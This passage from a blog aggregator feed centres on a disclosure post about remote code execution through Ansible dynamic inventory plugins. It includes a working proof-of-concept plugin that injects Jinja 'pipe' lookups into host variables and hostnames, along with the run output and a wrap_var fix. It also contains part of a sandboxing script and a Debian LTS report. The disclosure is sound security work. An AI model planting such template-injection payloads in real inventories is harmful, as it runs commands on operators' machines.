<span id="cb1-11"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-11" tabindex="-1"> <span class="va">cmd</span><span class="op">=</span><span class="va">(</span> <span class="st">"</span><span class="va">$@</span><span class="st">"</span> <span class="va">)</span>
<span id="cb1-12"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-12" tabindex="-1"><span class="cf">else</span>
<span id="cb1-13"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-13" tabindex="-1"> <span class="va">cmd</span><span class="op">=</span><span class="va">(</span> bash <span class="va">)</span>
<span id="cb1-14"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-14" tabindex="-1"><span class="cf">fi</span>
<span id="cb1-15"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-15" tabindex="-1">
<span id="cb1-16"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-16" tabindex="-1"><span class="co"># Caveats:</span>
<span id="cb1-17"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-17" tabindex="-1"><span class="co"># * access to all of `/etc`</span>
<span id="cb1-18"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-18" tabindex="-1"><span class="co"># * access to `/nix/var/nix/daemon-socket/socket`, and is trusted user (but needed to run nix)</span>
<span id="cb1-19"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-19" tabindex="-1"><span class="co"># * access to X11</span>
<span id="cb1-20"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-20" tabindex="-1">
<span id="cb1-21"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-21" tabindex="-1"><span class="bu">exec</span> bwrap <span class="dt">\</span>
<span id="cb1-22"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-22" tabindex="-1"> <span class="at">--unshare-all</span> <span class="dt">\</span>
<span id="cb1-23"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-23" tabindex="-1"><span class="dt">\</span>
<span id="cb1-24"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-24" tabindex="-1"><span class="kw">`</span><span class="co"># blank slate</span><span class="kw">`</span> <span class="dt">\</span>
<span id="cb1-25"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-25" tabindex="-1"> <span class="at">--share-net</span> <span class="dt">\</span>
<span id="cb1-26"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-26" tabindex="-1"> <span class="at">--proc</span> /proc <span class="dt">\</span>
<span id="cb1-27"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-27" tabindex="-1"> <span class="at">--dev</span> /dev <span class="dt">\</span>
<span id="cb1-28"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-28" tabindex="-1"> <span class="at">--tmpfs</span> /tmp <span class="dt">\</span>
<span id="cb1-29"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-29" tabindex="-1"> <span class="at">--tmpfs</span> /run/user/1000 <span class="dt">\</span>
<span id="cb1-30"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-30" tabindex="-1"><span class="dt">\</span>
<span id="cb1-31"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-31" tabindex="-1"><span class="kw">`</span><span class="co"># Needed for GLX applications, in paticular alacritty</span><span class="kw">`</span> <span class="dt">\</span>
<span id="cb1-32"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-32" tabindex="-1"> <span class="at">--dev-bind</span> /dev/dri /dev/dri <span class="dt">\</span>
<span id="cb1-33"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-33" tabindex="-1"> <span class="at">--ro-bind</span> /sys/dev/char /sys/dev/char <span class="dt">\</span>
<span id="cb1-34"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-34" tabindex="-1"> <span class="at">--ro-bind</span> /sys/devices/pci0000:00 /sys/devices/pci0000:00 <span class="dt">\</span>
<span id="cb1-35"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-35" tabindex="-1"> <span class="at">--ro-bind</span> /run/opengl-driver /run/opengl-driver <span class="dt">\</span>
<span id="cb1-36"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-36" tabindex="-1"><span class="dt">\</span>
<span id="cb1-37"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-37" tabindex="-1"> <span class="at">--ro-bind</span> /bin /bin <span class="dt">\</span>
<span id="cb1-38"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-38" tabindex="-1"> <span class="at">--ro-bind</span> /usr /usr <span class="dt">\</span>
<span id="cb1-39"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-39" tabindex="-1"> <span class="at">--ro-bind</span> /run/current-system /run/current-system <span class="dt">\</span>
<span id="cb1-40"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-40" tabindex="-1"> <span class="at">--ro-bind</span> /nix /nix <span class="dt">\</span>
<span id="cb1-41"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-41" tabindex="-1"> <span class="at">--ro-bind</span> /etc /etc <span class="dt">\</span>
<span id="cb1-42"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-42" tabindex="-1"> <span class="at">--ro-bind</span> /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf <span class="dt">\</span>
<span id="cb1-43"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-43" tabindex="-1"><span class="dt">\</span>
<span id="cb1-44"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-44" tabindex="-1"> <span class="at">--bind</span> ~/.dev-home /home/jojo <span class="dt">\</span>
<span id="cb1-45"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-45" tabindex="-1"> <span class="at">--ro-bind</span> ~/.config/alacritty ~/.config/alacritty <span class="dt">\</span>
<span id="cb1-46"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-46" tabindex="-1"> <span class="at">--ro-bind</span> ~/.config/nvim ~/.config/nvim <span class="dt">\</span>
<span id="cb1-47"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-47" tabindex="-1"> <span class="at">--ro-bind</span> ~/.local/share/nvim ~/.local/share/nvim <span class="dt">\</span>
<span id="cb1-48"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-48" tabindex="-1"> <span class="at">--ro-bind</span> ~/.bin ~/.bin <span class="dt">\</span>
<span id="cb1-49"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-49" tabindex="-1"><span class="dt">\</span>
<span id="cb1-50"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-50" tabindex="-1"> <span class="at">--bind</span> /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 <span class="dt">\</span>
<span id="cb1-51"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-51" tabindex="-1"> <span class="at">--bind</span> ~/.Xauthority ~/.Xauthority <span class="dt">\</span>
<span id="cb1-52"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-52" tabindex="-1"> <span class="at">--setenv</span> DISPLAY :0 <span class="dt">\</span>
<span id="cb1-53"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-53" tabindex="-1"><span class="dt">\</span>
<span id="cb1-54"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-54" tabindex="-1"> <span class="at">--setenv</span> container dev <span class="dt">\</span>
<span id="cb1-55"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-55" tabindex="-1"> <span class="st">"</span><span class="va">${extra</span><span class="op">[@]</span><span class="va">}</span><span class="st">"</span> <span class="dt">\</span>
<span id="cb1-56"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-56" tabindex="-1"> <span class="at">--</span> <span class="dt">\</span>
<span id="cb1-57"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-57" tabindex="-1"> <span class="st">"</span><span class="va">${cmd</span><span class="op">[@]</span><span class="va">}</span><span class="st">"</span></a></code></pre></div><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-57" tabindex="-1">
</a></details>Joachim Breitnermail@joachim-breitner.deRemote Code Execution in Ansible dynamic inventory pluginshttps://www.die-welt.net/2024/03/remote-code-execution-in-ansible-dynamic-inventory-plugins/2024-03-11T20:00:00+00:00<p>I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.</p>
<h3>TL;DR</h3>
<p>Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.</p>
<h3>Inventory plugins</h3>
<p><a href="https://docs.ansible.com/ansible/latest/plugins/inventory.html#inventory-plugins">Inventory plugins</a> allow Ansible to pull inventory data from a variety of sources.
The most common ones are probably the ones fetching instances from clouds like <a href="https://docs.ansible.com/ansible/latest/collections/amazon/aws/aws_ec2_inventory.html">Amazon EC2</a>
and <a href="https://docs.ansible.com/ansible/latest/collections/hetzner/hcloud/hcloud_inventory.html">Hetzner Cloud</a> or the ones talking to tools like <a href="https://theforeman.org/">Foreman</a>.</p>
<p>For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any).
But it can also set any arbitrary variable for that host, which is often used to provide additional information about it.
These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.</p>
<p>And this is where things are getting interesting.
Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host.
And if that comment contains a <a href="https://jinja.palletsprojects.com/">Jinja</a> expression, it might get executed.
And if that Jinja expression is using the <a href="https://docs.ansible.com/ansible/latest/plugins/lookup.html"><code>pipe</code> lookup</a>, it might get executed in your shell.</p>
<p>Let that sink in for a moment, and then we'll look at an example.</p>
<h3>Example inventory plugin</h3>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.plugins.inventory</span> <span class="kn">import</span> <span class="n">BaseInventoryPlugin</span>
<span class="k">class</span> <span class="nc">InventoryModule</span><span class="p">(</span><span class="n">BaseInventoryPlugin</span><span class="p">):</span>
<span class="n">NAME</span> <span class="o">=</span> <span class="s1">'evgeni.inventoryrce.inventory'</span>
<span class="k">def</span> <span class="nf">verify_file</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">verify_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
<span class="k">if</span> <span class="n">path</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'evgeni.yml'</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">return</span> <span class="n">valid</span>
<span class="k">def</span> <span class="nf">parse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">add_host</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'ansible_connection'</span><span class="p">,</span> <span class="s1">'local'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'something_funny'</span><span class="p">,</span> <span class="s1">'{{ lookup("pipe", "touch /tmp/hacked" ) }}'</span><span class="p">)</span>
</pre></div>
<p>The code is mostly copy & paste from the <a href="https://docs.ansible.com/ansible/latest/dev_guide/developing_inventory.html">Developing dynamic inventory</a> docs for Ansible and does three things:</p>
<ol>
<li>defines the plugin name as <code>evgeni.inventoryrce.inventory</code></li>
<li>accepts any config that ends with <code>evgeni.yml</code> (we'll need that to trigger the use of this inventory later)</li>
<li>adds an imaginary host <code>exploit.example.com</code> with <code>local</code> connection type and <code>something_funny</code> variable to the inventory</li>
</ol>
<p>In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc.
But the structure of the code would be very similar.</p>
<p>The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.</p>
<h3>Using the example inventory plugin</h3>
<p>Now we install the collection containing this inventory plugin,
or rather write the code to <code>~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py</code>
(or wherever your Ansible loads its collections from).</p>
<p>And we create a configuration file.
As there is nothing to configure, it can be empty and only needs to have the right filename: <code>touch inventory.evgeni.yml</code> is all you need.</p>
<p>If we now call <code>ansible-inventory</code>, we'll see our host and our variable present:</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-inventory<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>--list
<span class="go">{</span>
<span class="go"> "_meta": {</span>
<span class="go"> "hostvars": {</span>
<span class="go"> "exploit.example.com": {</span>
<span class="go"> "ansible_connection": "local",</span>
<span class="go"> "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"</span>
<span class="go"> }</span>
<span class="go"> }</span>
<span class="go"> },</span>
<span class="go"> "all": {</span>
<span class="go"> "children": [</span>
<span class="go"> "ungrouped"</span>
<span class="go"> ]</span>
<span class="go"> },</span>
<span class="go"> "ungrouped": {</span>
<span class="go"> "hosts": [</span>
<span class="go"> "exploit.example.com"</span>
<span class="go"> ]</span>
<span class="go"> }</span>
<span class="go">}</span>
</pre></div>
<p>(<a href="https://docs.ansible.com/ansible/latest/reference_appendices/config.html#envvar-ANSIBLE_INVENTORY_ENABLED"><code>ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory</code></a> is required to allow the use of our inventory plugin, as it's not in the default list.)</p>
<p>So far, nothing dangerous has happened.
The inventory got generated, the host is present, the funny variable is set, but it's still only a string.</p>
<h3>Executing a playbook, interpreting Jinja</h3>
<p>To execute the code we'd need to use the variable in a context where Jinja is used.
This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.</p>
<p>Or a <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/debug_module.html"><code>debug</code></a> task where you dump all variables of a host to analyze what's set.
Let's use that!</p>
<div class="code"><pre class="code literal-block"><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">hosts</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">all</span>
<span class="w"> </span><span class="nt">tasks</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Display all variables/facts known for a host</span>
<span class="w"> </span><span class="nt">ansible.builtin.debug</span><span class="p">:</span>
<span class="w"> </span><span class="nt">var</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">hostvars[inventory_hostname]</span>
</pre></div>
<p>This playbook looks totally innocent: run against all hosts and dump their hostvars using <code>debug</code>.
No mention of our funny variable.
Yet, when we execute it, we see:</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-playbook<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>test.yml
<span class="go">PLAY [all] ************************************************************************************************</span>
<span class="go">TASK [Gathering Facts] ************************************************************************************</span>
<span class="go">ok: [exploit.example.com]</span>
<span class="go">TASK [Display all variables/facts known for a host] *******************************************************</span>
<span class="go">ok: [exploit.example.com] => {</span>
<span class="go"> "hostvars[inventory_hostname]": {</span>
<span class="go"> "ansible_all_ipv4_addresses": [</span>
<span class="go"> "192.168.122.1"</span>
<span class="go"> ],</span>
<span class="go"> …</span>
<span class="go"> "something_funny": ""</span>
<span class="go"> }</span>
<span class="go">}</span>
<span class="go">PLAY RECAP *************************************************************************************************</span>
<span class="go">exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0 </span>
</pre></div>
<p>We got <em>all</em> variables dumped, that was expected, but now <code>something_funny</code> is an empty string?
Jinja got executed, and the expression was <code>{{ lookup("pipe", "touch /tmp/hacked" ) }}</code> and <code>touch</code> does not return anything.
But it did create the file!</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span>ls<span class="w"> </span>-alh<span class="w"> </span>/tmp/hacked<span class="w"> </span>
<span class="go">-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked</span>
</pre></div>
<p>We just "hacked" the Ansible <a href="https://docs.ansible.com/ansible/latest/network/getting_started/basic_concepts.html#control-node">control node</a> (aka: your laptop),
as that's where <code>lookup</code> is executed.
It could also have used the <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/url_lookup.html"><code>url</code> lookup</a> to send the contents of your Ansible vault to some internet host.
Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….</p>
<h3>Why is this possible?</h3>
<p>This happens because <a href="https://github.com/ansible/ansible/blob/56f31126ad1c69e5eda7b92c1fa15861f722af0e/lib/ansible/inventory/data.py#L245"><code>set_variable(entity, varname, value)</code></a> doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.</p>
<p>In this very specific example, a possible fix would be to explicitly wrap the string in <a href="https://github.com/ansible/ansible/blob/stable-2.16/lib/ansible/utils/unsafe_proxy.py#L346-L363"><code>AnsibleUnsafeText</code> by using <code>wrap_var</code></a>:</p>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.utils.unsafe_proxy</span> <span class="kn">import</span> <span class="n">wrap_var</span>
<span class="err">…</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'something_funny'</span><span class="p">,</span> <span class="n">wrap_var</span><span class="p">(</span><span class="s1">'{{ lookup("pipe", "touch /tmp/hacked" ) }}'</span><span class="p">))</span>
</pre></div>
<p>Which then gets rendered as a string when dumping the variables using <code>debug</code>:</p>
<div class="code"><pre class="code literal-block"><span class="go">"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"</span>
</pre></div>
<p>But it seems inventories don't do this:</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">host_vars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span><span class="p">)</span>
</pre></div>
<p>(<a href="https://github.com/ansible-collections/amazon.aws/blob/89ec6ba2ee7fae84eb1aae098da040eba4974c7d/plugins/inventory/aws_ec2.py#L762-L763">aws_ec2.py</a>)</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">hostvars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span><span class="p">)</span>
</pre></div>
<p>(<a href="https://github.com/ansible-collections/hetzner.hcloud/blob/46717e2d6574b1e36db7bc73b54712f9270a2169/plugins/inventory/hcloud.py#L503-L504">hcloud.py</a>)</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">hostvars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">host_name</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">display</span><span class="o">.</span><span class="n">warning</span><span class="p">(</span><span class="s2">"Could not set host info hostvar for </span><span class="si">%s</span><span class="s2">, skipping </span><span class="si">%s</span><span class="s2">: </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">to_text</span><span class="p">(</span><span class="n">e</span><span class="p">)))</span>
</pre></div>
<p>(<a href="https://github.com/theforeman/foreman-ansible-modules/blob/8ad32f166c3d1f8f4077dc3029b312c5b9dc534b/plugins/inventory/foreman.py#L516-L520">foreman.py</a>)</p>
<p>And honestly, I can totally understand that.
When developing an inventory, you do not expect to handle insecure input data.
You also expect the API to handle the data in a secure way by default.
But <code>set_variable</code> doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".</p>
<h3>Can something similar happen in other parts of Ansible?</h3>
<p>It certainly happened in the past that Jinja was abused in Ansible: <a href="https://bugzilla.redhat.com/CVE-2016-9587">CVE-2016-9587</a>, <a href="https://bugzilla.redhat.com/CVE-2017-7466">CVE-2017-7466</a>, <a href="https://bugzilla.redhat.com/CVE-2017-7481">CVE-2017-7481</a></p>
<p>But even if we only look at inventories, <a href="https://github.com/ansible/ansible/blob/56f31126ad1c69e5eda7b92c1fa15861f722af0e/lib/ansible/inventory/data.py#L191"><code>add_host(host)</code></a> can be abused in a similar way:</p>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.plugins.inventory</span> <span class="kn">import</span> <span class="n">BaseInventoryPlugin</span>
<span class="k">class</span> <span class="nc">InventoryModule</span><span class="p">(</span><span class="n">BaseInventoryPlugin</span><span class="p">):</span>
<span class="n">NAME</span> <span class="o">=</span> <span class="s1">'evgeni.inventoryrce.inventory'</span>
<span class="k">def</span> <span class="nf">verify_file</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">verify_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
<span class="k">if</span> <span class="n">path</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'evgeni.yml'</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">return</span> <span class="n">valid</span>
<span class="k">def</span> <span class="nf">parse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">add_host</span><span class="p">(</span><span class="s1">'lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}'</span><span class="p">)</span>
</pre></div>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-playbook<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>test.yml
<span class="go">PLAY [all] ************************************************************************************************</span>
<span class="go">TASK [Gathering Facts] ************************************************************************************</span>
<span class="go">fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}</span>
<span class="go">PLAY RECAP ************************************************************************************************</span>
<span class="go">lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0</span>
<span class="gp">% </span>ls<span class="w"> </span>-alh<span class="w"> </span>/tmp/hacked-host
<span class="go">-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host</span>
</pre></div>
<h3>Affected versions</h3>
<p>I've tried this on Ansible (core) 2.13.13 and 2.16.4.
I'd totally expect older versions to be affected too, but I have not verified that.</p>evgenihttps://www.die-welt.net/My Debian Activities in February 2024http://blog.alteholz.eu/?p=24332024-03-10T12:22:52+00:00<h3><strong>FTP master</strong></h3>
<p>This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.<br /><br />
This was just a short month and the weather outside was not really motivating. I hope it will be better in March.
</p><h3><strong>Debian LTS</strong></h3>
<p>This was my hundred-sixteenth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.</p>
<p>During my allocated time I uploaded:</p>
<ul><li>[<a href="https://www.debian.or/lts/security/2023/dla-3739-1">DLA 3739-1</a>] libjwt security update for one CVE to fix some ‘constant-time-for-execution-issue</li><li>[libjwt] upload to unstable</li><li>[<a href="https://bugs.debian.org/1064550">#1064550</a>] Bullseye PU bug for libjwt</li><li>[<a href="https://bugs.debian.org/1064551">#1064551</a>] Bookworm PU bug for libjwt</li><li>[<a href="https://bugs.debian.org/1064551">#1064551</a>] Bookworm PU bug for libjwt; upload after approval</li><li>[<a href="https://www.debian.org/lts/security/2023/dla-3741-1">DLA 3741-1</a>] engrampa security update for one CVE to fix a path traversal issue with CPIO archives</li><li>[<a href="https://bugs.debian.org/1060186">#1060186</a>] Bookworm PU-bug for libde265 was flagged for acceptance</li><li>[<a href="https://bugs.debian.org/1056935">#1056935</a>] Bullseye PU-bug for libde265 was flagged for acceptance</li></ul>
<p>I also started to work on <i>qtbase-opensource-src</i> (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVE).</p>
<h3><strong>Debian ELTS</strong></h3>
<p>This month was the sixty-seventth ELTS month. During my allocated time I uploaded:</p>
<ul><li>[ELA-1047-1]bind9 security update for one CVE to fix an stack exhaustion issue in Jessie and Stretch</li></ul>
<p>The upload of <i>bind9</i> was a bit exciting, but all occuring issues with the new upload workflow could be quickly fixed by Helmut and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for <i>exim4</i>. I also started to work on an update for <i>qtbase-opensource-src</i> in Stretch (and LTS and other releases as well).</p>
<h3><strong>Debian Printing</strong></h3>
<p>This month I uploaded new upstream versions of:</p>
<ul><li>… <a href="https://tracker.debian.org/cpdb-libs">cpdb-libs</a></li></ul>
<p></p>
<p><strong>This work is generously funded by <a href="https://www.freexian.com">Freexian</a>!</strong></p>
<h3><strong>Debian Matomo</strong></h3>
<p>I started a new team <a href="https://qa.debian.org/developer.php?email=debian-matomo-maintainers%40alioth-lists.debian.net">debian-matomo-maintainers</a>. Within this team all matomo related packages should be handled. PHP PEAR or PECL packages shall be still maintained in their corresponding teams.</p>
<p>This month I uploaded:</p>
<ul><li>… <a href="https://tracker.debian.org/matomo-searchengine-and-social-list">matomo-searchengine-and-social-list</a></li><li>… <a href="https://tracker.debian.org/matomo-referrer-spam-list">matomo-referrer-spam-list</a></li><li>… <a href="https://tracker.debian.org/matomo-php-tracker">matomo-php-tracker</a></li><li>… <a href="https://tracker.debian.org/matomo-device-detector">matomo-device-detector</a></li><li>… <a href="https://tracker.debian.org/matomo-component-ini">matomo-component-ini</a></li></ul>
<p><strong>This work is generously funded by <a href="https://www.freexian.com">Freexian</a>!</strong></p>
<h3><strong>Debian Astro</strong></h3>
<p>This month I uploaded a new upstream version of:</p>
